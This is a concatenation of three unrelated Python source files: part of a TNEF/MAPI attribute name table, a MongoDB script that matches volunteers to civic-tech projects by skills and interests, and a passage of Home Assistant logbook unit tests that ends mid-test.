MAPI_MHS_COMMON_NAME : "MAPI_MHS_COMMON_NAME",
MAPI_ORGANIZATIONAL_ID_NUMBER : "MAPI_ORGANIZATIONAL_ID_NUMBER",
MAPI_SURNAME : "MAPI_SURNAME",
MAPI_ORIGINAL_ENTRYID : "MAPI_ORIGINAL_ENTRYID",
MAPI_ORIGINAL_DISPLAY_NAME : "MAPI_ORIGINAL_DISPLAY_NAME",
MAPI_ORIGINAL_SEARCH_KEY : "MAPI_ORIGINAL_SEARCH_KEY",
MAPI_POSTAL_ADDRESS : "MAPI_POSTAL_ADDRESS",
MAPI_COMPANY_NAME : "MAPI_COMPANY_NAME",
MAPI_TITLE : "MAPI_TITLE",
MAPI_DEPARTMENT_NAME : "MAPI_DEPARTMENT_NAME",
MAPI_OFFICE_LOCATION : "MAPI_OFFICE_LOCATION",
MAPI_PRIMARY_TELEPHONE_NUMBER : "MAPI_PRIMARY_TELEPHONE_NUMBER",
MAPI_BUSINESS2_TELEPHONE_NUMBER : "MAPI_BUSINESS2_TELEPHONE_NUMBER",
MAPI_MOBILE_TELEPHONE_NUMBER : "MAPI_MOBILE_TELEPHONE_NUMBER",
MAPI_RADIO_TELEPHONE_NUMBER : "MAPI_RADIO_TELEPHONE_NUMBER",
MAPI_CAR_TELEPHONE_NUMBER : "MAPI_CAR_TELEPHONE_NUMBER",
MAPI_OTHER_TELEPHONE_NUMBER : "MAPI_OTHER_TELEPHONE_NUMBER",
MAPI_TRANSMITABLE_DISPLAY_NAME : "MAPI_TRANSMITABLE_DISPLAY_NAME",
MAPI_PAGER_TELEPHONE_NUMBER : "MAPI_PAGER_TELEPHONE_NUMBER",
MAPI_USER_CERTIFICATE : "MAPI_USER_CERTIFICATE",
MAPI_PRIMARY_FAX_NUMBER : "MAPI_PRIMARY_FAX_NUMBER",
MAPI_BUSINESS_FAX_NUMBER : "MAPI_BUSINESS_FAX_NUMBER",
MAPI_HOME_FAX_NUMBER : "MAPI_HOME_FAX_NUMBER",
MAPI_COUNTRY : "MAPI_COUNTRY",
MAPI_LOCALITY : "MAPI_LOCALITY",
MAPI_STATE_OR_PROVINCE : "MAPI_STATE_OR_PROVINCE",
MAPI_STREET_ADDRESS : "MAPI_STREET_ADDRESS",
MAPI_POSTAL_CODE : "MAPI_POSTAL_CODE",
MAPI_POST_OFFICE_BOX : "MAPI_POST_OFFICE_BOX",
MAPI_TELEX_NUMBER : "MAPI_TELEX_NUMBER",
MAPI_ISDN_NUMBER : "MAPI_ISDN_NUMBER",
MAPI_ASSISTANT_TELEPHONE_NUMBER : "MAPI_ASSISTANT_TELEPHONE_NUMBER",
MAPI_HOME2_TELEPHONE_NUMBER : "MAPI_HOME2_TELEPHONE_NUMBER",
MAPI_ASSISTANT : "MAPI_ASSISTANT",
MAPI_SEND_RICH_INFO : "MAPI_SEND_RICH_INFO",
MAPI_WEDDING_ANNIVERSARY : "MAPI_WEDDING_ANNIVERSARY",
MAPI_BIRTHDAY : "MAPI_BIRTHDAY",
MAPI_HOBBIES : "MAPI_HOBBIES",
MAPI_MIDDLE_NAME : "MAPI_MIDDLE_NAME",
MAPI_DISPLAY_NAME_PREFIX : "MAPI_DISPLAY_NAME_PREFIX",
MAPI_PROFESSION : "MAPI_PROFESSION",
MAPI_PREFERRED_BY_NAME : "MAPI_PREFERRED_BY_NAME",
MAPI_SPOUSE_NAME : "MAPI_SPOUSE_NAME",
MAPI_COMPUTER_NETWORK_NAME : "MAPI_COMPUTER_NETWORK_NAME",
MAPI_CUSTOMER_ID : "MAPI_CUSTOMER_ID",
MAPI_TTYTDD_PHONE_NUMBER : "MAPI_TTYTDD_PHONE_NUMBER",
MAPI_FTP_SITE : "MAPI_FTP_SITE",
MAPI_GENDER : "MAPI_GENDER",
MAPI_MANAGER_NAME : "MAPI_MANAGER_NAME",
MAPI_NICKNAME : "MAPI_NICKNAME",
MAPI_PERSONAL_HOME_PAGE : "MAPI_PERSONAL_HOME_PAGE",
MAPI_BUSINESS_HOME_PAGE : "MAPI_BUSINESS_HOME_PAGE",
MAPI_CONTACT_VERSION : "MAPI_CONTACT_VERSION",
MAPI_CONTACT_ENTRYIDS : "MAPI_CONTACT_ENTRYIDS",
MAPI_CONTACT_ADDRTYPES : "MAPI_CONTACT_ADDRTYPES",
MAPI_CONTACT_DEFAULT_ADDRESS_INDEX : "MAPI_CONTACT_DEFAULT_ADDRESS_INDEX",
MAPI_CONTACT_EMAIL_ADDRESSES : "MAPI_CONTACT_EMAIL_ADDRESSES",
MAPI_COMPANY_MAIN_PHONE_NUMBER : "MAPI_COMPANY_MAIN_PHONE_NUMBER",
MAPI_CHILDRENS_NAMES : "MAPI_CHILDRENS_NAMES",
MAPI_HOME_ADDRESS_CITY : "MAPI_HOME_ADDRESS_CITY",
MAPI_HOME_ADDRESS_COUNTRY : "MAPI_HOME_ADDRESS_COUNTRY",
MAPI_HOME_ADDRESS_POSTAL_CODE : "MAPI_HOME_ADDRESS_POSTAL_CODE",
MAPI_HOME_ADDRESS_STATE_OR_PROVINCE : "MAPI_HOME_ADDRESS_STATE_OR_PROVINCE",
MAPI_HOME_ADDRESS_STREET : "MAPI_HOME_ADDRESS_STREET",
MAPI_HOME_ADDRESS_POST_OFFICE_BOX : "MAPI_HOME_ADDRESS_POST_OFFICE_BOX",
MAPI_OTHER_ADDRESS_CITY : "MAPI_OTHER_ADDRESS_CITY",
MAPI_OTHER_ADDRESS_COUNTRY : "MAPI_OTHER_ADDRESS_COUNTRY",
MAPI_OTHER_ADDRESS_POSTAL_CODE : "MAPI_OTHER_ADDRESS_POSTAL_CODE",
MAPI_OTHER_ADDRESS_STATE_OR_PROVINCE : "MAPI_OTHER_ADDRESS_STATE_OR_PROVINCE",
MAPI_OTHER_ADDRESS_STREET : "MAPI_OTHER_ADDRESS_STREET",
MAPI_OTHER_ADDRESS_POST_OFFICE_BOX : "MAPI_OTHER_ADDRESS_POST_OFFICE_BOX",
MAPI_STORE_PROVIDERS : "MAPI_STORE_PROVIDERS",
MAPI_AB_PROVIDERS : "MAPI_AB_PROVIDERS",
MAPI_TRANSPORT_PROVIDERS : "MAPI_TRANSPORT_PROVIDERS",
MAPI_DEFAULT_PROFILE : "MAPI_DEFAULT_PROFILE",
MAPI_AB_SEARCH_PATH : "MAPI_AB_SEARCH_PATH",
MAPI_AB_DEFAULT_DIR : "MAPI_AB_DEFAULT_DIR",
MAPI_AB_DEFAULT_PAB : "MAPI_AB_DEFAULT_PAB",
MAPI_FILTERING_HOOKS : "MAPI_FILTERING_HOOKS",
MAPI_SERVICE_NAME : "MAPI_SERVICE_NAME",
MAPI_SERVICE_DLL_NAME : "MAPI_SERVICE_DLL_NAME",
MAPI_SERVICE_ENTRY_NAME : "MAPI_SERVICE_ENTRY_NAME",
MAPI_SERVICE_UID : "MAPI_SERVICE_UID",
MAPI_SERVICE_EXTRA_UIDS : "MAPI_SERVICE_EXTRA_UIDS",
MAPI_SERVICES : "MAPI_SERVICES",
MAPI_SERVICE_SUPPORT_FILES : "MAPI_SERVICE_SUPPORT_FILES",
MAPI_SERVICE_DELETE_FILES : "MAPI_SERVICE_DELETE_FILES",
MAPI_AB_SEARCH_PATH_UPDATE : "MAPI_AB_SEARCH_PATH_UPDATE",
MAPI_PROFILE_NAME : "MAPI_PROFILE_NAME",
MAPI_IDENTITY_DISPLAY : "MAPI_IDENTITY_DISPLAY",
MAPI_IDENTITY_ENTRYID : "MAPI_IDENTITY_ENTRYID",
MAPI_RESOURCE_METHODS : "MAPI_RESOURCE_METHODS",
MAPI_RESOURCE_TYPE : "MAPI_RESOURCE_TYPE",
MAPI_STATUS_CODE : "MAPI_STATUS_CODE",
MAPI_IDENTITY_SEARCH_KEY : "MAPI_IDENTITY_SEARCH_KEY",
MAPI_OWN_STORE_ENTRYID : "MAPI_OWN_STORE_ENTRYID",
MAPI_RESOURCE_PATH : "MAPI_RESOURCE_PATH",
MAPI_STATUS_STRING : "MAPI_STATUS_STRING",
MAPI_X400_DEFERRED_DELIVERY_CANCEL : "MAPI_X400_DEFERRED_DELIVERY_CANCEL",
MAPI_HEADER_FOLDER_ENTRYID : "MAPI_HEADER_FOLDER_ENTRYID",
MAPI_REMOTE_PROGRESS : "MAPI_REMOTE_PROGRESS",
MAPI_REMOTE_PROGRESS_TEXT : "MAPI_REMOTE_PROGRESS_TEXT",
MAPI_REMOTE_VALIDATE_OK : "MAPI_REMOTE_VALIDATE_OK",
MAPI_CONTROL_FLAGS : "MAPI_CONTROL_FLAGS",
MAPI_CONTROL_STRUCTURE : "MAPI_CONTROL_STRUCTURE",
MAPI_CONTROL_TYPE : "MAPI_CONTROL_TYPE",
MAPI_DELTAX : "MAPI_DELTAX",
MAPI_DELTAY : "MAPI_DELTAY",
MAPI_XPOS : "MAPI_XPOS",
MAPI_YPOS : "MAPI_YPOS",
MAPI_CONTROL_ID : "MAPI_CONTROL_ID",
MAPI_INITIAL_DETAILS_PANE : "MAPI_INITIAL_DETAILS_PANE",
MAPI_ID_SECURE_MIN : "MAPI_ID_SECURE_MIN",
MAPI_ID_SECURE_MAX : "MAPI_ID_SECURE_MAX"
}
OutlookGuid = '05133f00aa00da98101b450b6ed8da90'
AppointmentGuid = '46000000000000c00000000000062002'
def __init__(self, attr_type, name, data, guid):
self.attr_type = attr_type
self.name = name
self.data = data
self.guid = guid
def __str__(self):
aname = TNEFMAPI_Attribute.codes.get(self.name, "UNKNOWN!")
return "<ATTR: %s>" % aname
|
|
import sys
import pprint
pp = pprint.PrettyPrinter();
import pymongo
from pymongo import MongoClient
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Oct 12 20:30:54 2016
@author: ryanlim, jpitts
Requirements:
- pymongo needs to be installed
- mongodb needs to be running
- brigade-matchmaker web needs to be running
(populates the users table in the brigade-matchmaker collection)
For installation instructions:
http://api.mongodb.com/python/current/installation.html
For the API:
http://api.mongodb.com/python/current/api/pymongo/collection.html
Install dependencies:
python -m pip install pymongo
Interface:
param skills_list: Skills that the user can contribute.
param skills_offered_list: Skills the the user wants to learn.
param interests_list: Interests of the user.
param goals_list: Project-related goals of the user.
@usage:
python ./db-match-algo.py client-dev/javascript,data-sci/python null housing developer,presenter
python ./db-match-algo.py data-sci null homelessness developer
python ./db-match-algo.py ruby null null developer,learner
python ./db-match-algo.py null null null leader
python ./db-match-algo.py null client-dev/javascript null null
"""
# database configuration
collection_name = 'brigade-matchmaker'
client = MongoClient('localhost', 27017)
db = client[collection_name]
# load the taxonomies and attributes from the database
""" NOTE: taxn_attributes below describes the data structure used in
breaking down the hierarchy of attributes submitted by users
taxn_attributes = {
'skills': [
{name: 'server-dev', parent: 'skills', synonyms: ['back-end']},
{name: 'nodejs', parent: 'server-dev', synonyms: ['node']},
{name: 'python', parent: 'server-dev', synonyms: ['django']},
],
'interests': [
],
'goals': [
]
}
"""
taxonomies = []
taxn_attributes = {}
taxn_name = ""
for attribute in db.projecttaxonomies.find({}):
#pp.pprint(need)
if attribute['parent'] == None:
#print "taxonomy=" + attribute['name']
taxonomies.append(attribute)
taxn_name=attribute['name']
taxn_attributes[taxn_name] = []
else:
#print " attribute=" + attribute['name']
taxn_attributes[taxn_name].append(attribute)
""" NOTE: projects_list below is for understanding the data structure
used in the algo (soon to reflect what is in the database)
projects_list = [
{
'id':'ux-research',
'name':'UX Research',
'interests':['all','community-organizer'],
'skills_needed':['python','javascript','html'],
'goals_needed':['developer','helper']
},
{
'id':'data-sciences',
'name':'Data Sciences',
'interests':['all'],
'skills_needed':['python'],
'goals_needed':['developer']
}
]
"""
# load the projects list from the database
projects_list = []
projects_count = 0
for project in db.projects.find({}):
#print 'load ' + project['name']
#print project['_id']
#pp.pprint(project['matchingConfig'])
#pp.pprint(project['todoItems'])
# NOTE: the algo will add the following data to project:
# project['interests'] = []
# project['interests_total'] = 0
# project['interests_matched'] = []
# project['skills_offered'] = []
# project['skills_offered_categories'] = []
# project['skills_offered_total'] = 0
# project['skills_offered_matched'] = []
# project['skills_needed'] = []
# project['skills_needed_categories'] = []
# project['skills_total'] = 0
# project['skills_matched'] = []
# project['goals_needed'] = []
# project['goals_total'] = 0
# project['goals_matched'] = []
# interests
project['interests'] = []
for need in project['matchingConfig']['interests']:
project['interests'].append(need)
# skills offered
project['skills_offered'] = []
project['skills_offered_categories'] = []
for offering in project['matchingConfig']['skillsOffered']:
project['skills_offered'].append(offering)
if "/" in offering:
#print('category: ' + offering.split("/")[0])
project['skills_offered_categories'].append(offering.split("/")[0])
# skills needed
project['skills_needed'] = []
project['skills_needed_categories'] = []
for need in project['matchingConfig']['skillsNeeded']:
project['skills_needed'].append(need)
if "/" in need:
#print('category: ' + offering.split("/")[0])
project['skills_needed_categories'].append(need.split("/")[0])
# goals
project['goals_needed'] = []
for need in project['matchingConfig']['goalsNeeded']:
project['goals_needed'].append(need)
projects_list.append(project)
projects_count += 1
# END loading projects list
def matchmaking (
skills_list, # targeting skills needed by project
skills_offered_list, # targeting skills offered by project
interests_list, # targeting shared interests
goals_list # targeting goals needed by project
):
"""
print 'matchmaking()'
print 'skills='
pp.pprint(skills_list)
print 'skills_offered='
pp.pprint(skills_offered_list)
print 'interests='
pp.pprint(interests_list)
print 'goals='
pp.pprint(goals_list)
"""
#iterate over the projects
for project in projects_list:
# factors to prioritize skills
skills_factor = 2
skills_offered_factor = 2
interests_factor = 1
goals_factor = 1
project['user_score'] = 0
# in this project hold the totals for this user's
# skills, interests, and goals
project['skills_total'] = 0
project['skills_matched'] = []
project['skills_offered_total'] = 0
project['skills_offered_matched'] = []
project['interests_total'] = 0
project['interests_matched'] = []
project['goals_total'] = 0
project['goals_matched'] = []
'''
iterate over the skills_list and get the corresponding
values for each skill and the total value from the project
'''
if len(skills_list) > 0:
for skill in skills_list:
if skill in project['skills_needed']:
project['skills_total'] += 1
project['skills_matched'].append(skill)
# category match# category match: category match to increase total score
if "/" not in skill and skill in project['skills_needed_categories']:
#print 'skill needed = ' + skill
#pp.pprint(project['skills_needed_categories'])
project['skills_total'] += 1
project['skills_matched'].append(skill)
# NOTE: initial work on category-related scoring
#elif "/" in skill and skill.split("/")[0] in project['skills_needed_categories']:
# project['skills_total'] += 1
'''
iterate over the skills_offered_list and get the corresponding
values for each skill offered and the total value from the project
'''
if len(skills_offered_list) > 0:
for offering in skills_offered_list:
if offering in project['skills_offered']:
project['skills_offered_total'] += 1
project['skills_offered_matched'].append(offering)
# category match: category match to increase total score
if "/" not in offering and offering in project['skills_offered_categories']:
#print 'skill offered ' + offering
#pp.pprint(project['skills_offered_categories'])
project['skills_offered_total'] += 1
project['skills_offered_matched'].append(skill)
# NOTE: initial work on category-related scoring
#elif "/" in offering and offering.split("/")[0] in project['skills_needed_categories']:
# project['skills_total'] += 1
'''
iterate over the interests_list and get the corresponding
values for each interest and the total value from the project
'''
if len(interests_list) > 0:
for interest in interests_list:
if interest in project['interests']:
project['interests_total'] += 1
project['interests_matched'].append(interest)
'''
iterate over the goals_list and get the corresponding
values for each goal and the total value from the project
'''
if len(goals_list) > 0:
for goal in goals_list:
if goal in project['goals_needed']:
project['goals_total'] += 1
project['goals_matched'].append(goal)
#Find the weighted total for the project
project_total = 0
project_total += (skills_factor * project['skills_total'])
project_total += (skills_offered_factor * project['skills_offered_total'])
project_total += (interests_factor * project['interests_total'])
project_total += (goals_factor * project['goals_total'])
#add the weighted total to the project_scores list
project['user_score'] = project_total
"""
print
print 'User match w/ ' + project['name']
print ' skills ' + str(project['skills_total'])
pp.pprint(project['skills_matched'])
print ' skills offered ' + str(project['skills_offered_total'])
pp.pprint(project['skills_offered_matched'])
print ' interests ' + str(project['interests_total'])
print ' goals ' + str(project['goals_total'])
print ' total score = ' + str(project_total)
"""
#create dictionary for project - key and project_score - value and set up values
project_dict = {}
#sorted_projects = sorted(project_list, key=lambda k: k['user_score'])
from operator import itemgetter
sorted_projects = sorted(projects_list, key=itemgetter('user_score'), reverse=True)
outputln = ""
for project in sorted_projects:
seq = (
str(project['_id']),
project['name'],
str(project['user_score']),
'skills',
str(project['skills_total']),
"(" + " ".join(project['skills_matched']) + ")",
'skillsOffered',
str(project['skills_offered_total']),
"(" + " ".join(project['skills_offered_matched']) + ")",
'interests',
str(project['interests_total']),
"(" + " ".join(project['interests_matched']) + ")",
'goals',
str(project['goals_total']),
"(" + " ".join(project['goals_matched']) + ")",
)
#pp.pprint(seq)
print(",".join(seq))
# if called from command line
if __name__ == "__main__":
skills = sys.argv[1] if (len(sys.argv) > 1 and sys.argv[1] != 'null') else ""
skills_list = skills.split(",")
skills_offered = sys.argv[2] if (len(sys.argv) > 2 and sys.argv[2] != 'null') else ""
skills_offered_list = skills_offered.split(",")
interests = sys.argv[3] if (len(sys.argv) > 3 and sys.argv[3] != 'null') else ""
interests_list = interests.split(",")
goals = sys.argv[4] if (len(sys.argv) > 4 and sys.argv[4] != 'null') else ""
goals_list = goals.split(",")
matchmaking (skills_list, skills_offered_list, interests_list, goals_list)
|
|
"""The tests for the logbook component."""
# pylint: disable=protected-access,too-many-public-methods
from datetime import timedelta
import unittest
from unittest.mock import patch
from homeassistant.components import sun
import homeassistant.core as ha
from homeassistant.const import (
EVENT_STATE_CHANGED, EVENT_HOMEASSISTANT_START, EVENT_HOMEASSISTANT_STOP,
ATTR_HIDDEN, STATE_NOT_HOME, STATE_ON, STATE_OFF)
import homeassistant.util.dt as dt_util
from homeassistant.components import logbook
from homeassistant.bootstrap import setup_component
from tests.common import mock_http_component, get_test_home_assistant
class TestComponentLogbook(unittest.TestCase):
"""Test the History component."""
EMPTY_CONFIG = logbook.CONFIG_SCHEMA({logbook.DOMAIN: {}})
def setUp(self):
"""Setup things to be run when tests are started."""
self.hass = get_test_home_assistant()
mock_http_component(self.hass)
self.hass.config.components += ['frontend', 'recorder', 'api']
with patch('homeassistant.components.logbook.'
'register_built_in_panel'):
assert setup_component(self.hass, logbook.DOMAIN,
self.EMPTY_CONFIG)
def tearDown(self):
"""Stop everything that was started."""
self.hass.stop()
def test_service_call_create_logbook_entry(self):
"""Test if service call create log book entry."""
calls = []
def event_listener(event):
calls.append(event)
self.hass.bus.listen(logbook.EVENT_LOGBOOK_ENTRY, event_listener)
self.hass.services.call(logbook.DOMAIN, 'log', {
logbook.ATTR_NAME: 'Alarm',
logbook.ATTR_MESSAGE: 'is triggered',
logbook.ATTR_DOMAIN: 'switch',
logbook.ATTR_ENTITY_ID: 'switch.test_switch'
}, True)
# Logbook entry service call results in firing an event.
# Our service call will unblock when the event listeners have been
# scheduled. This means that they may not have been processed yet.
self.hass.block_till_done()
self.assertEqual(1, len(calls))
last_call = calls[-1]
self.assertEqual('Alarm', last_call.data.get(logbook.ATTR_NAME))
self.assertEqual('is triggered', last_call.data.get(
logbook.ATTR_MESSAGE))
self.assertEqual('switch', last_call.data.get(logbook.ATTR_DOMAIN))
self.assertEqual('switch.test_switch', last_call.data.get(
logbook.ATTR_ENTITY_ID))
def test_service_call_create_log_book_entry_no_message(self):
"""Test if service call create log book entry without message."""
calls = []
def event_listener(event):
calls.append(event)
self.hass.bus.listen(logbook.EVENT_LOGBOOK_ENTRY, event_listener)
self.hass.services.call(logbook.DOMAIN, 'log', {}, True)
# Logbook entry service call results in firing an event.
# Our service call will unblock when the event listeners have been
# scheduled. This means that they may not have been processed yet.
self.hass.block_till_done()
self.assertEqual(0, len(calls))
def test_humanify_filter_sensor(self):
"""Test humanify filter too frequent sensor values."""
entity_id = 'sensor.bla'
pointA = dt_util.utcnow().replace(minute=2)
pointB = pointA.replace(minute=5)
pointC = pointA + timedelta(minutes=logbook.GROUP_BY_MINUTES)
eventA = self.create_state_changed_event(pointA, entity_id, 10)
eventB = self.create_state_changed_event(pointB, entity_id, 20)
eventC = self.create_state_changed_event(pointC, entity_id, 30)
entries = list(logbook.humanify((eventA, eventB, eventC)))
self.assertEqual(2, len(entries))
self.assert_entry(
entries[0], pointB, 'bla', domain='sensor', entity_id=entity_id)
self.assert_entry(
entries[1], pointC, 'bla', domain='sensor', entity_id=entity_id)
def test_filter_continuous_sensor_values(self):
"""Test remove continuous sensor events from logbook."""
entity_id = 'sensor.bla'
pointA = dt_util.utcnow()
attributes = {'unit_of_measurement': 'foo'}
eventA = self.create_state_changed_event(
pointA, entity_id, 10, attributes)
entries = list(logbook.humanify((eventA,)))
self.assertEqual(0, len(entries))
def test_exclude_events_hidden(self):
"""Test if events are excluded if entity is hidden."""
entity_id = 'sensor.bla'
entity_id2 = 'sensor.blu'
pointA = dt_util.utcnow()
pointB = pointA + timedelta(minutes=logbook.GROUP_BY_MINUTES)
eventA = self.create_state_changed_event(pointA, entity_id, 10,
{ATTR_HIDDEN: 'true'})
eventB = self.create_state_changed_event(pointB, entity_id2, 20)
events = logbook._exclude_events((ha.Event(EVENT_HOMEASSISTANT_STOP),
eventA, eventB), self.EMPTY_CONFIG)
entries = list(logbook.humanify(events))
self.assertEqual(2, len(entries))
self.assert_entry(
entries[0], name='Home Assistant', message='stopped',
domain=ha.DOMAIN)
self.assert_entry(
entries[1], pointB, 'blu', domain='sensor', entity_id=entity_id2)
def test_exclude_events_entity(self):
"""Test if events are filtered if entity is excluded in config."""
entity_id = 'sensor.bla'
entity_id2 = 'sensor.blu'
pointA = dt_util.utcnow()
pointB = pointA + timedelta(minutes=logbook.GROUP_BY_MINUTES)
eventA = self.create_state_changed_event(pointA, entity_id, 10)
eventB = self.create_state_changed_event(pointB, entity_id2, 20)
config = logbook.CONFIG_SCHEMA({
ha.DOMAIN: {},
logbook.DOMAIN: {logbook.CONF_EXCLUDE: {
logbook.CONF_ENTITIES: [entity_id, ]}}})
events = logbook._exclude_events((ha.Event(EVENT_HOMEASSISTANT_STOP),
eventA, eventB), config)
entries = list(logbook.humanify(events))
self.assertEqual(2, len(entries))
self.assert_entry(
entries[0], name='Home Assistant', message='stopped',
domain=ha.DOMAIN)
self.assert_entry(
entries[1], pointB, 'blu', domain='sensor', entity_id=entity_id2)
def test_exclude_events_domain(self):
"""Test if events are filtered if domain is excluded in config."""
entity_id = 'switch.bla'
entity_id2 = 'sensor.blu'
pointA = dt_util.utcnow()
pointB = pointA + timedelta(minutes=logbook.GROUP_BY_MINUTES)
eventA = self.create_state_changed_event(pointA, entity_id, 10)
eventB = self.create_state_changed_event(pointB, entity_id2, 20)
config = logbook.CONFIG_SCHEMA({
ha.DOMAIN: {},
logbook.DOMAIN: {logbook.CONF_EXCLUDE: {
logbook.CONF_DOMAINS: ['switch', ]}}})
events = logbook._exclude_events((ha.Event(EVENT_HOMEASSISTANT_START),
eventA, eventB), config)
entries = list(logbook.humanify(events))
self.assertEqual(2, len(entries))
self.assert_entry(entries[0], name='Home Assistant', message='started',
domain=ha.DOMAIN)
self.assert_entry(entries[1], pointB, 'blu', domain='sensor',
entity_id=entity_id2)
def test_exclude_automation_events(self):
"""Test if automation entries can be excluded by entity_id."""
name = 'My Automation Rule'
message = 'has been triggered'
domain = 'automation'
entity_id = 'automation.my_automation_rule'
entity_id2 = 'automation.my_automation_rule_2'
entity_id2 = 'sensor.blu'
eventA = ha.Event(logbook.EVENT_LOGBOOK_ENTRY, {
logbook.ATTR_NAME: name,
logbook.ATTR_MESSAGE: message,
logbook.ATTR_DOMAIN: domain,
logbook.ATTR_ENTITY_ID: entity_id,
})
eventB = ha.Event(logbook.EVENT_LOGBOOK_ENTRY, {
logbook.ATTR_NAME: name,
logbook.ATTR_MESSAGE: message,
logbook.ATTR_DOMAIN: domain,
logbook.ATTR_ENTITY_ID: entity_id2,
})
config = logbook.CONFIG_SCHEMA({
ha.DOMAIN: {},
logbook.DOMAIN: {logbook.CONF_EXCLUDE: {
logbook.CONF_ENTITIES: [entity_id, ]}}})
events = logbook._exclude_events((ha.Event(EVENT_HOMEASSISTANT_STOP),
eventA, eventB), config)
entries = list(logbook.humanify(events))
self.assertEqual(2, len(entries))
self.assert_entry(
entries[0], name='Home Assistant', message='stopped',
domain=ha.DOMAIN)
self.assert_entry(
entries[1], name=name, domain=domain, entity_id=entity_id2)
def test_include_events_entity(self):
"""Test if events are filtered if entity is included in config."""
entity_id = 'sensor.bla'
entity_id2 = 'sensor.blu'
pointA = dt_util.utcnow()
pointB = pointA + timedelta(minutes=logbook.GROUP_BY_MINUTES)
eventA = self.create_state_changed_event(pointA, entity_id, 10)
eventB = self.create_state_changed_event(pointB, entity_id2, 20)
config = logbook.CONFIG_SCHEMA({
ha.DOMAIN: {},
logbook.DOMAIN: {logbook.CONF_INCLUDE: {
logbook.CONF_ENTITIES: [entity_id2, ]}}})
events = logbook._exclude_events((ha.Event(EVENT_HOMEASSISTANT_STOP),
eventA, eventB), config)
entries = list(logbook.humanify(events))
self.assertEqual(2, len(entries))
self.assert_entry(
entries[0], name='Home Assistant', message='stopped',
domain=ha.DOMAIN)
self.assert_entry(
entries[1], pointB, 'blu', domain='sensor', entity_id=entity_id2)
def test_include_events_domain(self):
"""Test if events are filtered if domain is included in config."""
entity_id = 'switch.bla'
entity_id2 = 'sensor.blu'
pointA = dt_util.utcnow()
pointB = pointA + timedelta(minutes=logbook.GROUP_BY_MINUTES)
eventA = self.create_state_changed_event(pointA, entity_id, 10)
eventB = self.create_state_changed_event(pointB, entity_id2, 20)
config = logbook.CONFIG_SCHEMA({
ha.DOMAIN: {},
logbook.DOMAIN: {logbook.CONF_INCLUDE: {
logbook.CONF_DOMAINS: ['sensor', ]}}})
events = logbook._exclude_events((ha.Event(EVENT_HOMEASSISTANT_START),
eventA, eventB), config)
entries = list(logbook.humanify(events))
self.assertEqual(2, len(entries))
self.assert_entry(entries[0], name='Home Assistant', message='started',
domain=ha.DOMAIN)
self.assert_entry(entries[1], pointB, 'blu', domain='sensor',
entity_id=entity_id2)
def test_include_exclude_events(self):
"""Test if events are filtered if include and exclude is configured."""
entity_id = 'switch.bla'
entity_id2 = 'sensor.blu'
entity_id3 = 'sensor.bli'
pointA = dt_util.utcnow()
pointB = pointA + timedelta(minutes=logbook.GROUP_BY_MINUTES)
eventA1 = self.create_state_changed_event(pointA, entity_id, 10)
eventA2 = self.create_state_changed_event(pointA, entity_id2, 10)
eventA3 = self.create_state_changed_event(pointA, entity_id3, 10)
eventB1 = self.create_state_changed_event(pointB, entity_id, 20)
eventB2 = self.create_state_changed_event(pointB, entity_id2, 20)
config = logbook.CONFIG_SCHEMA({
ha.DOMAIN: {},
logbook.DOMAIN: {
logbook.CONF_INCLUDE: {
logbook.CONF_DOMAINS: ['sensor', ],
logbook.CONF_ENTITIES: ['switch.bla', ]},
logbook.CONF_EXCLUDE: {
logbook.CONF_DOMAINS: ['switch', ],
logbook.CONF_ENTITIES: ['sensor.bli', ]}}})
events = logbook._exclude_events((ha.Event(EVENT_HOMEASSISTANT_START),
eventA1, eventA2, eventA3,
eventB1, eventB2), config)
entries = list(logbook.humanify(events))
self.assertEqual(3, len(entries))
self.assert_entry(entries[0], name='Home Assistant', message='started',
domain=ha.DOMAIN)
self.assert_entry(entries[1], pointA, 'blu', domain='sensor',
entity_id=entity_id2)
self.assert_entry(entries[2], pointB, 'blu', domain='sensor',
entity_id=entity_id2)
def test_exclude_auto_groups(self):
"""Test if events of automatically generated groups are filtered."""
entity_id = 'switch.bla'
entity_id2 = 'group.switches'
pointA = dt_util.utcnow()
eventA = self.create_state_changed_event(pointA, entity_id, 10)
eventB = self.create_state_changed_event(pointA, entity_id2, 20,
{'auto': True})
entries = list(logbook.humanify((eventA, eventB)))
self.assertEqual(1, len(entries))
self.assert_entry(entries[0], pointA, 'bla', domain='switch',
entity_id=entity_id)
def test_exclude_attribute_changes(self):
"""Test if events of attribute changes are filtered."""
entity_id = 'switch.bla'
entity_id2 = 'switch.blu'
pointA = dt_util.utcnow()
pointB = pointA + timedelta(minutes=1)
eventA = self.create_state_changed_event(pointA, entity_id, 10)
eventB = self.create_state_changed_event(
pointA, entity_id2, 20, last_changed=pointA, last_updated=pointB)
entries = list(logbook.humanify((eventA, eventB)))
self.assertEqual(1, len(entries))
self.assert_entry(entries[0], pointA, 'bla', domain='switch',
entity_id=entity_id)
def test_entry_to_dict(self):
"""Test conversion of entry to dict."""
entry = logbook.Entry(
dt_util.utcnow(), 'Alarm', 'is triggered', 'switch', 'test_switch'
)
data = entry.as_dict()
self.assertEqual('Alarm', data.get(logbook.ATTR_NAME))
self.assertEqual('is triggered', data.get(logbook.ATTR_MESSAGE))
self.assertEqual('switch', data.get(logbook.ATTR_DOMAIN))
self.assertEqual('test_switch', data.get(logbook.ATTR_ENTITY_ID))
def test_home_assistant_start_stop_grouped(self):
"""Test if HA start and stop events are grouped.
Events that are occuring in the same minute.
"""
entries = list(logbook.humanify((
ha.Event(EVENT_HOMEASSISTANT_STOP),
ha.Event(EVENT_HOMEASSISTANT_START),
)))
self.assertEqual(1, len(entries))
self.assert_entry(
entries[0], name='Home Assistant', message='restarted',
domain=ha.DOMAIN)
def test_home_assistant_start(self):
"""Test if HA start is not filtered or converted into a restart."""
entity_id = 'switch.bla'
pointA = dt_util.utcnow()
entries = list(logbook.humanify((
ha.Event(EVENT_HOMEASSISTANT_START),
self.create_state_changed_event(pointA, entity_id, 10)
)))
self.assertEqual(2, len(entries))
self.assert_entry(
entries[0], name='Home Assistant', message='started',
domain=ha.DOMAIN)
self.assert_entry(entries[1], pointA, 'bla', domain='switch',
entity_id=entity_id)
def test_entry_message_from_state_device(self):
"""Test if logbook message is correctly created for switches.
Especially test if the special handling for turn on/off events is done.
"""
pointA = dt_util.utcnow()
# message for a device state change
eventA = self.create_state_changed_event(pointA, 'switch.bla', 10)
to_state = ha.State.from_dict(eventA.data.get('new_state'))
message = logbook._entry_message_from_state(to_state.domain, to_state)
self.assertEqual('changed to 10', message)
# message for a switch turned on
